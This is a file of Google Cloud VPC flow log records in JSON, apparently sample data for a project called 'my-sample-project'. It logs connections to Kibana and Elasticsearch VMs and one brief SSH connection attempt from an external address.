-{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"203.0.113.12","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwo
rk_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"203.0.113.58","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"203.0.113.134","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
-{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"203.0.113.58","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"203.0.113.27","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pro
ject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetw
ork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 